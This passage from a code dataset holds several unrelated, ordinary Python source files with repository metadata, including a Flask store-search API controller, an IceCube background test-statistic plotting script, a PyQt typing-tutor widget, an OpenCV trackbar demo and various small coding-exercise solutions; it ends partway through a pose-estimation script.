not in en_ru and new_word != \"\":\n en_ru[new_word] = new_translate\n return\n\n\n\ndef save_dict(en_ru, dict_file_name=\"mydict.py\"):\n mydict = open(dict_file_name, \"w\")\n mydict.write(\"en_ru = %s\" % en_ru)\n mydict.close()\n 
return\n\nfill_dict(en_ru)\nsave_dict(en_ru)\nprint(en_ru)\n","repo_name":"doublewera/engtest","sub_path":"vocabulary.py","file_name":"vocabulary.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32778179225","text":"'''\nCreated on Aug 5, 2013\n\n@author: walton\n'''\nimport os \n\nfrom diffcalc.ub.persistence import UbCalculationNonPersister\n\n# These should be by the user *before* importing other modules\ngeometry = None\nhardware = None\nubcalc_persister = UbCalculationNonPersister()\n\naxes_scannable_group = None\nenergy_scannable = None\nenergy_scannable_multiplier_to_get_KeV=1\n\n\n# These will be set by dcyou, dcvlieg or dcwillmot\nubcalc_strategy = None\nangles_to_hkl_function = None # Used by checkub to avoid coupling it to an hkl module\ninclude_sigtau=False\ninclude_reference=False","repo_name":"swissfel/diffcalc3","sub_path":"diffcalc/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37109797522","text":"import matplotlib as mpl\nmpl.use('pdf')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nfrom scipy.stats import chi2\nfrom icecube.umdtools import cache,misc\nfrom icecube import icetray, dataclasses, histlite\n\nfrom skylab import statistics\nfitfun = statistics.delta_chi2\nweibfun = statistics.weib\n##Make plots prettier\nmisc.tex_mpl_rc()\nw=4\npropsmall = mpl.font_manager.FontProperties (size='small')\npropxsmall = mpl.font_manager.FontProperties (size='x-small')\n\n###This script imports the sensitivities from the submitter and plots them.###\n#picklefolder = '/data/user/brelethford/Data/SwiftBAT70m/pickle/'\n\n## Define fcn to read in background trials previously logged ##\n\ndef getBckg(datafolder):\n files = [cache.load(datafolder+file) for file in os.listdir(datafolder) if file.endswith('.array')]\n n_inj=[]\n nsources=[]\n TS=[]\n beta=(0.5) #For background ts\n TS_beta=[] #Calculated from the total TS median after we get all the TS.\n beta_err=[]\n gamma=[]\n for file in files:\n for item in range(len(file['n_inj'])):\n n_inj.append(file['n_inj'][item])\n nsources.append(file['nsources'][item])\n TS.append(file['TS'][item])\n gamma.append(file['gamma'][item])\n\n TSs=TS\n TS_beta = np.percentile(TSs, 100.*(1. - beta))\n m=np.count_nonzero(np.asarray(TSs) > (TS_beta))\n i = len(TSs)\n fraction = float(m)/float(i)\n beta_err = (np.sqrt(fraction * (1. - fraction) / float(i)) if 0 < beta < 1 else 1.)\n bckg_trials = {'n_inj':n_inj,'nsources':np.asarray(nsources), 'TS':np.asarray(TS), 'beta':beta, 'beta_err':beta_err, 'TS_beta':TS_beta, 'gamma':np.asarray(gamma)}\n return bckg_trials\n\ndatafolder_2LAC = '/data/user/brelethford/Output/stacking_sensitivity/2LAC/flux_3yr/background_trials/'\n\nbckg_2LAC = getBckg(datafolder_2LAC)\n\nprint (bckg_2LAC['TS_beta'])\n\n\n##Now we make hists of the test statistics ##\nbins = 100\nrange = (0.0,20.0)\nh_2LAC = histlite.hist(bckg_2LAC['TS'],bins=bins,range=range)\n\n##I'll include a chi squared distribution w/ DOF=1 (and 2, just because). I'll also show the best fitting chi2 dist for each weighting scheme.##\nchi2fit_2LAC = fitfun(bckg_2LAC['TS'],df=2., floc=0., fscale=1.)\n\n#Now for a weibfit on the distribution.\nweib_flux_2LAC = weibfun(bckg_2LAC['TS'],df=2., floc=0., fscale=1.)\n\n## Now to plot. 
##\nfig_bckg = plt.figure (figsize=(w, .75*w))\nax=plt.gca()\n\nweib_fits = [weib_flux_2LAC]\nchi2_fits = [chi2fit_2LAC]\ncolors=['blue']\nfor chi2_fit,weib_fit,color in zip(chi2_fits,weib_fits,colors):\n x = np.linspace(0,20,100)\n ax.plot(x, chi2_fit.pdf(x), linestyle=':',color=color, label=r'$\\tilde{\\chi}^2$')#: df='+str(round(chi2_fit.par[0],2)))\n ax.plot(x, weib_fit.pdf(x), linestyle='--', color=color, label = 'weibull')\n\nhistlite.plot1d(ax,h_2LAC.normalize(integrate=True),histtype='step',label='flux-weighted',color='blue')\nax.set_title(r'2LAC Background TS - 3yr (59-86I)')\nax.set_xlabel(r'TS')\nplt.subplots_adjust (left=.2, bottom=.2)\nax.set_ylabel(r'Normalized Counts') \nax.set_ylim(8e-5,1)\nax.set_xlim(0,16)\nax.semilogy() \nplt.legend(loc='upper right', prop=propxsmall, ncol=2)\nfig_bckg.savefig('/data/user/brelethford/AGN_Core/Plots/backgroundTS/bckgTS_2LAC_3yr.pdf')\nfig_bckg.savefig('/data/user/brelethford/AGN_Core/Plots/backgroundTS/bckgTS_2LAC_3yr.png')\n","repo_name":"brelethford/IceCube","sub_path":"skylab/sensitivity/stacking_sensitivity/plotting/obsolete/2LAC_background.py","file_name":"2LAC_background.py","file_ext":"py","file_size_in_byte":3292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21083439324","text":"# https://www.hackerrank.com/challenges/three-month-preparation-kit-time-conversion/problem?isFullScreen=true&h_l=interview&playlist_slugs%5B%5D=preparation-kits&playlist_slugs%5B%5D=three-month-preparation-kit&playlist_slugs%5B%5D=three-month-week-one\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'timeConversion' function below.\n#\n# The function is expected to return a STRING.\n# The function accepts STRING s as parameter.\n#\n\ndef timeConversion(s):\n # Write your code here\n time, noon = s[:-2].split(':'), s[-2:]\n hour = int(s[:2])\n \n if noon == 'PM':\n hour = hour%12 + 12\n else:\n hour = hour%12\n time[0] = ''+str(hour) if hour//10 else '0'+str(hour)\n \n return ':'.join(time)\n \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n s = input()\n\n result = timeConversion(s)\n\n fptr.write(result + '\\n')\n\n fptr.close()\n","repo_name":"SquirtlesAlgorithmStudy/squirtlesAlgorithmStudy-S345","sub_path":"SangminByeon/HackerLink/TimeConversion.py","file_name":"TimeConversion.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"28100245128","text":"from typing import Optional\n\nfrom list_node import ListNode\nfrom test_framework import generic_test\n\n\ndef remove_duplicates(L: ListNode) -> Optional[ListNode]:\n # equal elems will be adjacent\n # 1. for each sequence of unique nums, find start and end node, end is not same num\n # 2. start.next = end\n # 3. 
move on\n\n node_iter = L\n\n while node_iter is not None:\n # node_iter sits at start of new sequence\n start_node = node_iter\n while node_iter is not None and node_iter.data == start_node.data:\n node_iter = node_iter.next\n\n # node_iter is None (end of list) or has different data value\n start_node.next = node_iter\n\n\n return L\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main(\n 'remove_duplicates_from_sorted_list.py',\n 'remove_duplicates_from_sorted_list.tsv', remove_duplicates))\n","repo_name":"adityagoel4512/EPIJudge","sub_path":"epi_judge_python/remove_duplicates_from_sorted_list.py","file_name":"remove_duplicates_from_sorted_list.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"81"} +{"seq_id":"41398510296","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def findBottomLeftValue(self, root: TreeNode) -> int:\n \n row = [root]\n \n while row:\n answer = row[0].val\n row = [child for node in row for child in (node.left, node.right) if child != None]\n return answer\n ","repo_name":"johnsanc/wb-cohort3","sub_path":"week-5/find-bottom-left-tree-val.py","file_name":"find-bottom-left-tree-val.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24949547829","text":"from data_structures.trees.binary_tree_lists import *\nfrom data_structures.trees.binary_tree_nodes import BinaryTree\n\n\"\"\"\nWrite a function that returns a tree_in using the list of lists functions that looks like this:\n\n a\n b c\n d e f\n\"\"\"\n\n\ndef build_tree_list():\n root = binary_tree(\"a\")\n insert_left(root, \"b\")\n insert_right(root, \"c\")\n b = get_left_child(root)\n c = get_right_child(root)\n insert_right(b, \"d\")\n insert_left(c, \"e\")\n insert_right(c, \"f\")\n return root\n\n\nprint(build_tree_list())\n\n\ndef build_tree_node():\n root = BinaryTree(\"a\")\n root.insert_left(\"b\")\n root.insert_right(\"c\")\n\n b = root.get_left_child()\n b.insert_right(\"d\")\n\n c = root.get_right_child()\n c.insert_left(\"e\")\n c.insert_right(\"f\")\n return root\n\n\ntree = build_tree_node()\nprint(tree.get_right_child().get_root())\nprint(tree.get_left_child().get_root())\nprint(tree.get_left_child().get_right_child().get_root())\nprint(tree.get_right_child().get_left_child().get_root())\nprint(tree.get_right_child().get_right_child().get_root())\n","repo_name":"SalihErenYuceturk/DSA-Python","sub_path":"exercises/6_trees_and_tree_algorithms/build_tree.py","file_name":"build_tree.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29746743185","text":"import os\nfrom flask_restplus import Namespace, Resource\nfrom flask import current_app as app\nfrom requests import post\n\nfrom backend.util.request.store.search_products_request import SearchProductsRequest\nfrom backend.util.response.store.search_products_results import SearchProductsResultsResponse\nfrom backend.util.response.error import ErrorResponse\nfrom backend.controller import ErrorHandler\nfrom backend.errors.no_content_error import NoContentError\nfrom backend.errors.request_error import ValidationError\n\n\nfindProductsNS = Namespace(\"Store\", description=\"Store related operations.\")\n\nREQUESTMODEL = 
SearchProductsRequest.get_model(findProductsNS, \"SearchProductsRequest\")\nRESPONSEMODEL = SearchProductsResultsResponse.get_model(findProductsNS, \"SearchProductsResultsResponse\")\nERRORMODEL = ErrorResponse.get_model(findProductsNS, \"ErrorResponse\")\n\n\n@findProductsNS.route(\"/find////\", strict_slashes=False)\nclass FinderProductsController(Resource):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.__url = app.config[\"WILLSTORES_WS\"]\n self.__headers = {\"Authorization\": \"Bearer %s\" % os.getenv(\"ACCESS_TOKEN\")}\n self.__finder_types = [\"search\", \"brand\", \"kind\"]\n\n @findProductsNS.param(\"ftype\", description=\"The product finder type: 'search', 'kind' or 'brand'\", _in=\"path\", required=True)\n @findProductsNS.param(\"arg\", description=\"The product finder argument: query, product kind or brand\", _in=\"path\", required=True)\n @findProductsNS.param(\"page\", description=\"The finder page.\", _in=\"path\", required=True)\n @findProductsNS.param(\"payload\", description=\"Optional\", _in=\"body\", required=False)\n @findProductsNS.expect(REQUESTMODEL)\n @findProductsNS.response(200, \"Success\", RESPONSEMODEL)\n @findProductsNS.response(204, \"No content\", {})\n @findProductsNS.response(400, \"Bad Request\", ERRORMODEL)\n @findProductsNS.response(500, \"Unexpected Error\", ERRORMODEL)\n @findProductsNS.response(502, \"Error while accessing the gateway server\", ERRORMODEL)\n @findProductsNS.response(504, \"No response from the gateway server\", ERRORMODEL)\n def post(self, ftype, arg, page):\n \"\"\"Finder products paginated by 'search query', 'kind' or 'brand'\"\"\"\n try:\n if ftype not in self.__finder_types:\n raise ValidationError(\"'%s' is an invalid URL finder type. Valid: 'search', 'brand' and 'kind'\" % ftype)\n if page <= 0:\n raise ValidationError(\"'%s' is an invalid URL page value. It must be a positive natural number\" % page)\n else:\n in_data = SearchProductsRequest.parse_json()\n req = post(\"%s/api/%s/%s/%s\" % (self.__url, ftype, arg, page), headers=self.__headers, json=in_data)\n req.raise_for_status()\n\n if req.status_code == 204:\n raise NoContentError()\n else:\n jsonsend = SearchProductsResultsResponse.marshall_json(req.json())\n return jsonsend\n except Exception as error:\n return ErrorHandler(error).handle_error()\n","repo_name":"willrp/willbuyer","sub_path":"backend/controller/api/store/find/find_products.py","file_name":"find_products.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"32582567995","text":"import numpy as np\nimport json\n\n\ndef convert_type(string):\n return float(string)\n\n\ndef get_info(path):\n # open the input file\n with open(path, \"r\") as info:\n data = json.load(info)\n return data\n\n\ndef save_info(data, path):\n # save the input file\n with open(path, \"w\") as f:\n json.dump(data, f, indent=4)\n\n\ndef get_extended_dataset(info, dataset_path):\n \"\"\" Using information from the info file, load images from the dataset file. 
\"\"\"\n\n training_dataset = []\n # open with context manager\n with open(dataset_path, \"r\") as dataset:\n for character_num in range(len(info[\"characters\"])):\n dataset.seek(info[\"characters\"][character_num][\"position\"] * 10 * 8 * 32 * 32)\n for sample in range(10):\n current_character = []\n for row_string in range(32):\n row_string = dataset.read(8 * 32)[:-1]\n row_pixels = row_string.split(\",\")\n row_pixels = list(map(convert_type, row_pixels))\n current_character.append(row_pixels)\n training_dataset.append(np.array(current_character))\n return training_dataset\n\n\ndef get_sample_dataset(info, sample_path):\n \"\"\" Using information from the info file, load images from the sample file. \"\"\"\n\n sample_dataset = []\n # open with context manager\n with open(sample_path, \"r\") as dataset:\n for character_num in range(len(info[\"characters\"])):\n dataset.seek(info[\"characters\"][character_num][\"position\"] * 8 * 32 * 32)\n current_character = []\n for row in range(32):\n row_string = dataset.read(8 * 32)[:-1]\n row_pixels = row_string.split(\",\")\n row_pixels = list(map(convert_type, row_pixels))\n current_character.append(row_pixels)\n sample_dataset.append(np.array(current_character))\n return sample_dataset\n\n\ndef get_single_character(position, sample_path):\n with open(sample_path, \"r\") as dataset:\n dataset.seek(position * 8 * 32 * 32)\n current_character = []\n for row in range(32):\n row_string = dataset.read(8 * 32)[:-1]\n row_pixels = row_string.split(\",\")\n row_pixels = list(map(convert_type, row_pixels))\n current_character.append(row_pixels)\n\n return current_character\n","repo_name":"alexanderneville/OCR","sub_path":"src/web_application/ocr/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"74856685706","text":"\"\"\"Updates statistics and process achievements script\"\"\"\nimport os, sys, getopt\nfrom web import app\nfrom services import AdminNotificationService, OrderService\n\n\nROOT = os.path.dirname(__file__)\n\n# run the application\ndef main(argv):\n \"\"\"main()\"\"\"\n try:\n opts, args = getopt.getopt(argv,\"h\")\n except getopt.GetoptError:\n print('close_market.py -h')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print(\"Close the market\")\n sys.exit(0)\n \n try:\n OrderService.close()\n except Exception as exc:\n AdminNotificationService.notify(str(exc))\n raise exc\n\n AdminNotificationService.notify(\"Market closed!\")\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"ttrnecka/rebbl-stock-market","sub_path":"close_market.py","file_name":"close_market.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"38685373776","text":"from src.application import Application\n\n\ndef write_result_file(write_texts, model_style, acc):\n file = Application.directory['data'] + Application.model_params['system'] + '_' + str(\n Application.model_params['epochs']) + '_' + model_style + '_acc_' + str(acc) + '.csv'\n write_file(file, write_texts)\n\n\ndef write_file(file, texts):\n print(\"write text in file \" + file)\n with open(file, encoding='utf-8', mode='w') as f:\n for i in range(0, len(texts)):\n f.write(texts[i] + 
'\\n')\n","repo_name":"EcnuHeng/DQD","sub_path":"src/file_util.py","file_name":"file_util.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7749448417","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 14 11:47:53 2018\n\n@author: 飯島直也\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n# Create a black image, a window\nimg = np.zeros((300,512,3), np.uint8)\ncv2.namedWindow('image')\n\n# parameter\nradius = 1\ncolor = (0, 0, 0)\n\ndef nothing(x):\n pass\n\ndef draw(event, x, y,flags,param):\n global radius, color\n if event == cv2.EVENT_LBUTTONDOWN:\n cv2.circle(img,(x,y),radius+1,color,-1)\n\n# create trackbars for color change\ncv2.createTrackbar('R','image',0,255,nothing)\ncv2.createTrackbar('G','image',0,255,nothing)\ncv2.createTrackbar('B','image',0,255,nothing)\n\n# create trackbar for setting a radius\ncv2.createTrackbar(\"radius\", 'image',1,100,nothing)\n\ncv2.setMouseCallback('image',draw)\n\nwhile(1):\n cv2.imshow('image',img)\n k = cv2.waitKey(1) & 0xFF\n if k == 27:\n break\n\n # get current positions of four trackbars\n r = cv2.getTrackbarPos('R','image')\n g = cv2.getTrackbarPos('G','image')\n b = cv2.getTrackbarPos('B','image')\n radius = cv2.getTrackbarPos(\"radius\",'image')\n\n color = (b, g, r)\n\ncv2.destroyAllWindows()","repo_name":"NaoyaIijima/OpencvTutorial","sub_path":"OpenCV_GUIfunc/trackbar.py","file_name":"trackbar.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"16574821848","text":"import os\nfrom datetime import datetime\nfrom PyQt5 import QtWidgets, QtCore, QtGui\nfrom enum import Enum\nfrom .signals import signals\nfrom .typing_input_handler import TypingInputHandler\nfrom .ui_settings import config\nfrom ..lessons import Lesson\n\n\nICON_PATH = os.path.join(\n os.path.dirname(os.path.abspath(__file__)),\n \"images\",\n config.get(\"main_window\", \"icon\")\n)\n\n\nclass TypingState(Enum):\n UNSTARTED = 1\n TYPING = 2\n FINISHED = 3\n\n\nclass TypingWidget(QtWidgets.QTextEdit):\n chars_per_word = config.getint(\"typing_widget\", \"chars_per_word\")\n\n def __init__(self, parent):\n super().__init__(\"\", parent)\n self.typing_state = TypingState.UNSTARTED\n self.set_font()\n self.create_timers()\n self.connect_signals()\n self.set_disabled()\n self.typing_input_handler = TypingInputHandler()\n self.refresh()\n\n def set_font(self):\n font_name = config.get(\"typing_widget\", \"font_name\")\n font_size = config.getint(\"typing_widget\", \"font_size\")\n font = QtGui.QFont(font_name, font_size, QtGui.QFont.Monospace)\n self.setFont(font)\n\n def create_timers(self):\n self.countdown_timer = QtCore.QTimer()\n self.typing_timer = QtCore.QTimer()\n self.countdown_timer.setInterval(1000)\n self.typing_timer.setInterval(1000)\n\n def connect_signals(self):\n signals.lesson_selected.connect(self.set_target_text)\n signals.start_countdown.connect(self.start_countdown)\n self.countdown_timer.timeout.connect(self.countdown)\n signals.disable_typing.connect(lambda: self.set_disabled(True))\n stats_methods = [\n self.show_typing_time,\n self.show_wpm,\n self.show_accuracy\n ]\n for method in stats_methods:\n self.typing_timer.timeout.connect(method)\n\n def start_countdown(self):\n if self.enable_typing_in <= 0:\n self.start_typing()\n return\n\n self.enable_typing_in = config.getint(\"typing_widget\", \"countdown\")\n 
signals.update_countdown.emit(self.enable_typing_in)\n self.countdown_timer.start()\n\n def countdown(self):\n self.enable_typing_in -= 1\n signals.update_countdown.emit(self.enable_typing_in)\n if self.enable_typing_in <= 0:\n self.start_typing()\n\n def start_typing(self):\n if self.typing_state != TypingState.FINISHED:\n self._last_keypress_time = datetime.now()\n self.countdown_timer.stop()\n self.set_disabled(False)\n signals.status_update.emit(\"Start typing...\")\n self.typing_state = TypingState.TYPING\n else:\n self.set_disabled(True)\n signals.status_update.emit(\"Finished exercise...\")\n\n def show_typing_time(self):\n self.typing_time += 1\n signals.update_typing_time.emit(self.typing_time)\n # pause the lesson if more than X seconds has elapsed since keystroke\n if self._last_keypress_time is not None:\n if (datetime.now() - self._last_keypress_time).seconds >= 10:\n self.set_disabled()\n msg = QtWidgets.QMessageBox()\n msg.setIcon(QtWidgets.QMessageBox.Information)\n msg.setWindowIcon(QtGui.QIcon(ICON_PATH))\n msg.setText(\"Press Start To Resume\")\n msg.setWindowTitle(\"Lesson Paused\")\n msg.exec_()\n\n def show_wpm(self):\n len_entered = len(self.typing_input_handler.entered_text)\n words_typed = len_entered / self.chars_per_word\n minutes_passed = (self.typing_time / 60)\n self.wpm = int(words_typed / minutes_passed)\n signals.update_wpm.emit(self.wpm)\n\n def show_accuracy(self):\n signals.update_accuracy.emit(self.typing_input_handler.accuracy)\n\n @QtCore.pyqtSlot(bool)\n def set_disabled(self, disabled=True):\n self.setDisabled(disabled)\n if disabled:\n self.typing_timer.stop()\n if self.typing_state is TypingState.TYPING:\n signals.status_update.emit(\"Paused...\")\n else:\n self.typing_timer.start()\n self.setFocus()\n\n def refresh(self):\n self.typing_input_handler.refresh()\n self._last_keypress_time = None\n self.enable_typing_in = config.getint(\"typing_widget\", \"countdown\")\n self.countdown_timer.stop()\n self.typing_timer.stop()\n\n self.typing_time = 0\n self.wpm = 0\n signals.update_countdown.emit(self.enable_typing_in)\n signals.update_typing_time.emit(self.typing_time)\n signals.update_wpm.emit(self.wpm)\n signals.update_accuracy.emit(self.typing_input_handler.accuracy)\n self.typing_state = TypingState.UNSTARTED\n\n @QtCore.pyqtSlot(str)\n def set_target_text(self, lesson_name):\n self.refresh()\n lesson = self._lesson = Lesson.get_lesson_by_name(lesson_name)\n self.typing_input_handler.refresh(lesson_name, lesson.content)\n self.update_display()\n signals.status_update.emit(\"Ready.\")\n self.setDisabled(True)\n\n def keyPressEvent(self, event):\n self._last_keypress_time = datetime.now()\n if self.typing_state is not TypingState.TYPING:\n return\n self.update_display(event)\n\n def update_display(self, event=None):\n if event is not None:\n self.typing_input_handler.process_key_press(event)\n self.setText(self.typing_input_handler.display_text)\n\n len_entered = len(self.typing_input_handler.entered_text)\n cursor = self.textCursor()\n cursor.setPosition(len_entered, QtGui.QTextCursor.MoveAnchor)\n self.setTextCursor(cursor)\n\n scrollbar = self.verticalScrollBar()\n current_position = scrollbar.sliderPosition()\n scrollbar_increment = 200\n if current_position > 0 or cursor.position() > 200:\n new_position = scrollbar.sliderPosition() + scrollbar_increment\n scrollbar.setSliderPosition(new_position)\n\n if self.typing_input_handler.finished:\n self.typing_state = TypingState.FINISHED\n self.typing_timer.stop()\n self.set_disabled(True)\n 
signals.status_update.emit(\"Finished exercise...\")\n signals.update_database_lessons_stats.emit(self._lesson.name)\n","repo_name":"simongarisch/pytypist","sub_path":"pytypist/ui/typing_widget.py","file_name":"typing_widget.py","file_ext":"py","file_size_in_byte":6350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"11506100577","text":"from pyfiglet import Figlet\nimport sys\nimport random\n\nfiglet = Figlet()\n\nfonts = figlet.getFonts()\nmodes = [\"-f\", \"--font\"]\n\nargc = len(sys.argv)\n\nif argc == 1:\n rand = random.randrange(0, len(fonts))\n figlet.setFont(font=fonts[rand])\n\n ans = input(\"Input: \")\n\n print(\"Output:\")\n print(figlet.renderText(ans))\n\nelif argc == 3:\n mode = sys.argv[1]\n font = sys.argv[2]\n\n if mode not in modes:\n print(\"Invalid usage\")\n sys.exit(1)\n\n if font not in fonts:\n print(\"Invalid usage\")\n sys.exit(1)\n\n\n figlet.setFont(font=font)\n\n ans = input(\"Input: \")\n\n print(\"Output:\")\n print(figlet.renderText(ans))\n\nelse:\n print(\"Invalid usage\")\n sys.exit(1)\n\n","repo_name":"Sanvals/CS50P","sub_path":"Week4/figlet/figlet.py","file_name":"figlet.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12956882059","text":"import pandas as pd\nimport numpy as np\nimport csv\nimport sys\n\nfrom utilities.process_csv import *\nfrom utilities.print_visualize_funcs import *\n\n# filesList= [\"../data/1_parameter/Batch_Size.tsv\", \"../data/1_parameter/Buffer_Memory.tsv\", \"../data/1_parameter/Linger_Ms.tsv\", \\\n# \"../data/1_parameter/Max_Request_Size.tsv\", \"../data/1_parameter/Message_Size.tsv\", \"../data/2_parameters/Batch_Size+Buffer_Memory.tsv\",\n# \"../data/2_parameters/Batch_Size+Linger_Ms.tsv\", \"../data/2_parameters/Batch_Size+Max_Request_Size.tsv\", \"../data/2_parameters/Buffer_Memory+Linger_Ms.tsv\", \n# \"../data/2_parameters/Linger_Ms+Max_Request_Size.tsv\"]\n\n\nif __name__ == '__main__':\n pd.set_option('display.max_rows', 500)\n pd.set_option('display.max_columns', 900)\n \n if len(sys.argv) < 3:\n print(\"Not enough arguments. 
Program needs 4(1+3) arguments, but you gave {}.\".format(len(sys.argv)))\n sys.exit(1)\n \n target = sys.argv[1]\n dataFile = sys.argv[2]\n print(\"Target: {}\".format(target))\n print(\"File: {}\".format(dataFile))\n\n data = readCSVpd(dataFile)\n\n # group data \n # data1 = data[data['Replication Factor'] == 1]\n # data2 = data[data['Replication Factor'] == 2]\n # data5 = data[data['Replication Factor'] == 5]\n\n # figData = (data1, data2, data5)\n # colors = (\"red\", \"green\", \"blue\")\n # groups = (\"Replication Factor 1\", \"Replication Factor 2\", \"Replication Factor 5\")\n\n # plt.figure(figsize=(16, 8))\n \n # for figData, color, group in zip(figData, colors, groups):\n # x, y = figData[feature], figData[target]\n # plt.scatter(x, y, c=color, edgecolors='none', s=15, label=group)\n\n features = data.columns.tolist()\n features.remove(target)\n\n for feature in features:\n scatter_plot(data, target, feature)\n # plt.show()\n\n\n \n \n\n\n\n\n\n\n \n\n \n\n\n\n\n\n\n \n\n ","repo_name":"GiannisKalopisis/Adjustable-pub-sub-system","sub_path":"ML/visualize/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"36983986266","text":"from math import ceil\n\n\ncharToIndex = {\n \"F\": 0,\n \"B\": 1,\n \"R\": 1,\n \"L\": 0\n}\n\ndef main():\n input_data = []\n with open(\"input.txt\") as input:\n for line in input:\n input_data.append(line.strip())\n \n input_data = input_data[:-1]\n \n seat_locations = []\n seat_ids = []\n for line in input_data:\n min_row = 0\n max_row = 127\n row = 0\n min_column = 0\n max_column = 7\n column = 0\n row_designators = line[0:7]\n column_designators = line[-3:]\n for designator in row_designators:\n index = charToIndex[designator]\n if index == 0:\n max_row -= ceil((max_row - min_row) / 2)\n row = max_row\n else:\n min_row += ceil((max_row - min_row) / 2)\n row = min_row\n\n for designator in column_designators:\n index = charToIndex[designator]\n if index == 0:\n max_column -= ceil((max_column - min_column) / 2)\n column = max_column\n else:\n min_column += ceil((max_column - min_column) / 2)\n column = min_column\n \n seat_locations.append((row, column))\n seat_ids.append(row * 8 + column)\n\n print(\"Highest seat id (p1): {}\".format(max(seat_ids)))\n \n rows_with_empty_seats = []\n for i in range(1, 127):\n used_seats = []\n for row, column in seat_locations:\n if row == i:\n used_seats.append(column)\n\n if len(used_seats) < 8:\n rows_with_empty_seats.append((i, used_seats))\n\n for row_data in rows_with_empty_seats:\n row, seats = row_data\n if len(seats) > 0:\n seats.sort()\n seat_offset = seats[0]\n for index, seat in enumerate(seats):\n if index + seat_offset != seat:\n print(\"My seat id (p2): {}\".format(8 * row + index))\n break\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"davidskeck/advent-of-code","sub_path":"AOC_2020/five/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17659287364","text":"import pose_utils\nimport os\nimport numpy as np\n\nfrom keras.models import load_model\nimport skimage.transform as st\nimport pandas as pd\nfrom tqdm import tqdm\nfrom numpy.random import shuffle\nfrom skimage.transform import resize\nfrom scipy.ndimage import gaussian_filter\nfrom skimage.io import imsave, imread\n\nfrom time import time\n\nfrom imageio 
import get_reader\nfrom pose_utils import draw_pose_from_cords\n\nfrom skimage.draw import polygon\n\nmapIdx = [[31,32], [39,40], [33,34], [35,36], [41,42], [43,44], [19,20], [21,22],\n [23,24], [25,26], [27,28], [29,30], [47,48], [49,50], [53,54], [51,52],\n [55,56], [37,38], [45,46]]\n\nlimbSeq = [[2,3], [2,6], [3,4], [4,5], [6,7], [7,8], [2,9], [9,10],\n [10,11], [2,12], [12,13], [13,14], [2,1], [1,15], [15,17],\n [1,16], [16,18], [3,17], [6,18]]\n\nthreshold = 0.1\nboxsize = 368\nscale_search = [0.5, 1, 1.5, 2]\n\n\ndef compute_cordinates(heatmap_avg, paf_avg, oriImg, th1=0.1, th2=0.05):\n all_peaks = []\n peak_counter = 0\n\n for part in range(18):\n map_ori = heatmap_avg[:,:,part]\n map = gaussian_filter(map_ori, sigma=3)\n\n map_left = np.zeros(map.shape)\n map_left[1:,:] = map[:-1,:]\n map_right = np.zeros(map.shape)\n map_right[:-1,:] = map[1:,:]\n map_up = np.zeros(map.shape)\n map_up[:,1:] = map[:,:-1]\n map_down = np.zeros(map.shape)\n map_down[:,:-1] = map[:,1:]\n\n peaks_binary = np.logical_and.reduce((map>=map_left, map>=map_right, map>=map_up, map>=map_down, map > th1))\n peaks = list(zip(np.nonzero(peaks_binary)[1], np.nonzero(peaks_binary)[0])) # note reverse\n\n peaks_with_score = [x + (map_ori[x[1],x[0]],) for x in peaks]\n id = list(range(peak_counter, peak_counter + len(peaks)))\n peaks_with_score_and_id = [peaks_with_score[i] + (id[i],) for i in range(len(id))]\n\n all_peaks.append(peaks_with_score_and_id)\n peak_counter += len(peaks)\n\n connection_all = []\n special_k = []\n mid_num = 10\n\n for k in range(len(mapIdx)):\n score_mid = paf_avg[:,:,[x-19 for x in mapIdx[k]]]\n candA = all_peaks[limbSeq[k][0]-1]\n 